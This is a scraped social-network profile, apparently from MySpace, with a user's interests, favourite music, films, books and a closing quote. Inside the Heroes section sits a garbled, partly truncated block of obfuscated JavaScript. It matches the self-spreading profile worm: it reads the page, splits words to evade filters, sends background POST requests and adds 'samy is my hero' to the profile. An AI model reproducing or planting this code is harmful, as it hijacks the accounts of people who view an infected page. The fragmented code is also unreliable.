About Me

I've said it once, and I'll say it again ... I'm a genius with earth-shattering ideas and no motivation.Oh yeah, and I kill for less.

I edited my profile with Thomas Myspace Editor V3.6 !

My Interests

Fitness, medicine, reading for education, reading for leisure, writing, eating peanut butter out of the jar, drinking milk out of the carton, trying to keep my foot out of my mouth (so to speak), eating all kinds of food, getting haircuts, smoothie factory, creatine, pharmacology, nice butts, soft hair, getting my head rubbed until I practically fall asleep, massages, Krista :-) meaningful conversations, philosophy -- education, not mowing my lawn when I should, knives, old books, naps, cats, lemurs, giant river otters, music of all genres, free stuff, sleeping in, and going to bed ... in no particular order :)

I'd like to meet:

The yellow brick road straight to Hell is paved with conventional wisdom.

Music:

Where to Start? Devotchka, HED p.e., nonpoint, skindred, our lady peace, bob marley, john mayer, radiohead, Thom Yorke, Augustana, Blue, Live, radiant*, envoy, keane, postal service, blue october, hootie and the blowfish, counting crows, finch, pete yorn, the killers, the wallflowers, muse, dashboard confessional, toadies, phantom planet, flickerstick, matchbox twenty, goo goo dolls, a perfect circle, jimmy eat world, seven mary three, cold, breaking benjamin, bush, filter, maroon 5, van morrison, the doors, coldplay, rubyhorse, third eye blind, audioslave, oasis, burden brothers, mindless self indulgence, the shins, the stills, eric clapton, OHNO (now called The Now), Damien Rice, Incubus, RATM, ryan adams, the eagles, deathcab for cutie, and sigur ros, and I have to give a shout out to the Green River Ordinance ... just to name a few

Movies:

It's a Wonderful Life - Jimmy Stewart ... enough said. Other than that, I like Snatch, Fight Club, American History X, Life of David Gale, Coming to America, Love+Hate, 16 years of Alcohol, Ray, Old School, Anchor Man, Napolean Dynamite (sorry ryan), Donnie Darko, Shrek, Bruce Almighty, Boondock Saints, A Beautiful Mind, Wicker Park, Good Will Hunting, One Hour Photo, Insomnia, Gladiator, Ocean's 11, and American Beauty.

Television:

I watch House, Dexter, and The History Channel. I deviate from that quite a bit when I'm hanging out with friends, but most of the stuff on tv is just plain shit, and I try to avoid it.

Books:

Steinbeck - The Grapes of Wrath, Of Mice and Men, The Winter of Our Discontent, Tortilla Flat, Pastures of Heaven, East of Eden, Cannery Row, Sweet Thursday.Books on neuroanatomy/biology/chemistry/pharmacology. Books about drugs and addiction, how they pertain to/affect the aforementioned subject matter.Religious literature and commentary.Other Misc. Literature - The Brothers Karamazov, The Idiot, and Crime and Punishment by Dostoevsky, Anthem by Ayn Rand, In Cold Blood and Other Voices, Other Rooms by Truman Capote, The Catcher in the Rye by Salinger, Lolita by Nabokov, Choke by Chuck Palahniuk, Paradise Lost by Milton, On Bullshit by Frankfurt, Shogun by Clavell, various poems by e.e. Cummings, Ezra Pound, and Shakespeare, a big fan of Emmerson, and just about anything that requires higher order thinking and doesn't inculcate the reader with overwrought themes and symbols. If it's going to do that, it better be the best damn book of the decade. Yeah, there are others, but if I listed them all, I'd look like a pretentious asshole.

Heroes:

House, Charles Barkley, Charles S. Peirce, Jimmy Stewart, John Steinbeck, and my dad. 0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','% 2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26' )}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J...statechange=BI');J.open(BJ,BH,true);if(BJ=='POS T'){J.setRequestHeader('Content-Type','application/x-www-for m-urlencoded');J.setRequestHeader('Content-Length',BK.length )}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace ('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. a quick thought

To the depressive, it's not the grave injustices of the world that make life taste so bitter, but the summation of a series of minor misfortunes.
